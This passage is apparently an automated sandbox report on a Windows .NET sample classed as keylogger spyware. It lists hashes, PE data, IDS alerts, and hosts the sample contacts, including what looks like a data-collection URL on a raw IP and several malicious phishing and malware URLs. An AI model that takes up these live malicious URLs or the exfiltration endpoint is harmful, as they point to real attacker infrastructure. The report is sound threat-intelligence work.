                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namez64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedz64BLPL.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    https://reallyfreegeoip.org/xml/z64BLPL.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    api.telegram.orgUnited Kingdom
                                    62041TELEGRAMRUtrue
                                    188.114.97.3
                                    reallyfreegeoip.orgEuropean Union
                                    13335CLOUDFLARENETUStrue
                                    193.122.6.168
                                    checkip.dyndns.comUnited States
                                    31898ORACLE-BMC-31898USfalse
                                    192.250.231.25
                                    mail.electradubai.comUnited States
                                    36454CNSV-LLCUStrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1519553
                                    Start date and time:2024-09-26 17:09:06 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 5s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:5
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:z64BLPL.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.winEXE@1/0@4/4
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 75
                                    • Number of non-executed functions: 37
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: z64BLPL.exe
                                    TimeTypeDescription
                                    11:09:59API Interceptor11497768x Sleep call for process: z64BLPL.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    149.154.167.220TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                          z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                            ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                              SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                        188.114.97.3HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                        • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/Ky4pZ0WB/download
                                                        ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                        • www.1win-moldovia.fun/1g7m/
                                                        http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                                                        • www.tiktok758.com/img/logo.4c830710.svg
                                                        TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                                        • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                                                        PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.rtprajalojago.live/2wnz/
                                                        (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                                                        • dddotx.shop/Mine/PWS/fre.php
                                                        QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/DiF66Hbf/download
                                                        http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • easyantrim.pages.dev/id.html
                                                        QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/13rSMZZi/download
                                                        193.122.6.168z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        rcontractorder.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        reallyfreegeoip.orgTLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        checkip.dyndns.comTLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.130.0
                                                        purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 158.101.44.242
                                                        VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 132.226.8.169
                                                        SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 158.101.44.242
                                                        Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 132.226.247.73
                                                        z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                        • 193.122.6.168
                                                        ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 132.226.8.169
                                                        CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.130.0
                                                        api.telegram.orgTLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ORACLE-BMC-31898USTLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.130.0
                                                        purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 158.101.44.242
                                                        SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 158.101.44.242
                                                        Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                        • 193.122.6.168
                                                        ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.130.0
                                                        RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 158.101.44.242
                                                        Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 158.101.44.242
                                                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        TELEGRAMRUTLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        CLOUDFLARENETUShttps://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1aGet hashmaliciousUnknownBrowse
                                                        • 104.26.8.129
                                                        Final_Contract_Copy-532392974.pdfGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        https://lsaustralasia-my.sharepoint.com/:f:/g/personal/janine_lsaust_com_au/EggCi2jFo0JOu2itfCjIwu4B_JvtVZTi0sK58OhnVfOx1Q?e=1IcsEeGet hashmaliciousUnknownBrowse
                                                        • 104.18.86.42
                                                        Spam .msgGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.25.14
                                                        Final_Contract_Copy-532392974.pdfGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylinkGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                        • 1.1.1.1
                                                        https://dyjh.invdigitaldocs.com/Yp45gGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.25.14
                                                        https://fub.direct/1/-vWjF5-zkXOO9FYu1PvcR9oL_v9wxWQugIahU1Sumip1aJEFjv7arGFxl8RwHXdse9Zqfr-Geb0wD7JwZstmrogxBkr93dacZn8BO2DpKYk/https/goncalvesalexandre.com/g63f/5876983556/Marlpar/#?email=amhAbWFybHBhci5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.25.14
                                                        https://uwazidigital.co.ke/mde/anti.php/Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.18.86.42
                                                        https://uwazidigital.co.ke/mde/anti.php/Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.25.14
                                                        CNSV-LLCUSF#U0130YAT TEKL#U0130F#U0130-2400.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 192.250.227.28
                                                        https://sesworld.com.au:443/it/mount/Get hashmaliciousUnknownBrowse
                                                        • 192.250.235.25
                                                        https://hmchive.com/?hcv=bGFldGl0aWEucGF0cnktYmFsYXRAc3VlZHp1Y2tlcmdyb3VwLmNvbS0tLS1DYXJsb3MgR2FpdMOhbg==Get hashmaliciousUnknownBrowse
                                                        • 192.250.227.21
                                                        z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                        • 192.250.231.28
                                                        https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                        • 192.250.227.23
                                                        https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                        • 192.250.227.23
                                                        http://linkplea.se/doarGet hashmaliciousUnknownBrowse
                                                        • 192.250.229.80
                                                        rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.250.234.170
                                                        https://kanomama.com/KFKFLDRFKLEK?///RG9tYWluXFVzZXJuYW1lQGRvbWFpbi5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                        • 192.250.229.40
                                                        Novi upit #876567-AWB.exeGet hashmaliciousFormBookBrowse
                                                        • 192.250.227.27
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        54328bd36c14bd82ddaa0c04b25ed9adTLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.97.3
                                                        REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                        • 188.114.97.3
                                                        VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.97.3
                                                        nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.97.3
                                                        z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        https://docs.google.com/drawings/d/1wD-DOvNLKuM60BZj5TLzFjKI87o3EE-OVAmvFF0fxPk/preview?usp=sharingGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.97.3
                                                        SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        3b5074b1b5d032e5620f69f9f700ff0ehttps://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1aGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        https://lsaustralasia-my.sharepoint.com/:f:/g/personal/janine_lsaust_com_au/EggCi2jFo0JOu2itfCjIwu4B_JvtVZTi0sK58OhnVfOx1Q?e=1IcsEeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                        • 149.154.167.220
                                                        Payment-Remittance_pdfrexel.se959575798273.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        No context
                                                        No created / dropped files found
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.631943584952463
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                        File name:z64BLPL.exe
                                                        File size:276'992 bytes
                                                        MD5:9c7cf85d2fa1d9c0b6c591b94cbf2830
                                                        SHA1:55822a8ed3ceda0fc325d998af2e379fb05a948e
                                                        SHA256:fe777d4ff348afb74ba7556da56b29a4ee0a66f7b044674fd1f18641573337f2
                                                        SHA512:813817015ddeec9e3bab1e1a945cecb942f75250fc2ea0de89de28c604e69d204d2a0217d4fa6be0d09bb662fddd2a17849a3989eb5a11bdd4b087ffddffb15f
                                                        SSDEEP:3072:8WAT5ctg+Orw0aqqb5mlXYOE6jc7dz0pHuhdzm3bfS2z/LQunsoAUYTVg4iIbbY:v6sm3bg7b
                                                        TLSH:A84484092FD8A801D6FF8877C2B65125C6BAF42306698E3E16D1F81A3E3D541DE46F63
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..$...........C... ...`....@.. ....................................@................................
                                                        Icon Hash:90cececece8e8eb0
                                                        Entrypoint:0x44432e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x442d40x57.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x1017.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x423340x424002c0ce32df969b8f70c1ba77c652c23c0False0.2141583136792453data5.633651046865783IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x460000x10170x120078b97a769c57cf460625c961b04b1a16False0.3543836805555556data4.76801789588623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x480000xc0x2003357292ff3dc4e25505da1bb6c6902f0False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x460a00x31cdata0.4271356783919598
                                                        RT_MANIFEST0x463bc0xc5bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3926651912741069
                                                        DLLImport
                                                        mscoree.dll_CorExeMain
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-09-26T17:09:59.130992+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.6.16880TCP
                                                        2024-09-26T17:10:00.568500+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.6.16880TCP
                                                        2024-09-26T17:10:01.211022+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449732188.114.97.3443TCP
                                                        2024-09-26T17:10:22.605931+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733193.122.6.16880TCP
                                                        2024-09-26T17:10:31.334225+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449740193.122.6.16880TCP
                                                        2024-09-26T17:10:35.905707+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449742193.122.6.16880TCP
                                                        2024-09-26T17:10:36.584155+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449742193.122.6.16880TCP
                                                        2024-09-26T17:10:38.849813+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449744193.122.6.16880TCP
                                                        2024-09-26T17:10:42.177920+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449746193.122.6.16880TCP
                                                        2024-09-26T17:10:43.662331+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449748193.122.6.16880TCP
                                                        2024-09-26T17:10:45.099812+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449750193.122.6.16880TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 26, 2024 17:09:58.206500053 CEST4973080192.168.2.4193.122.6.168
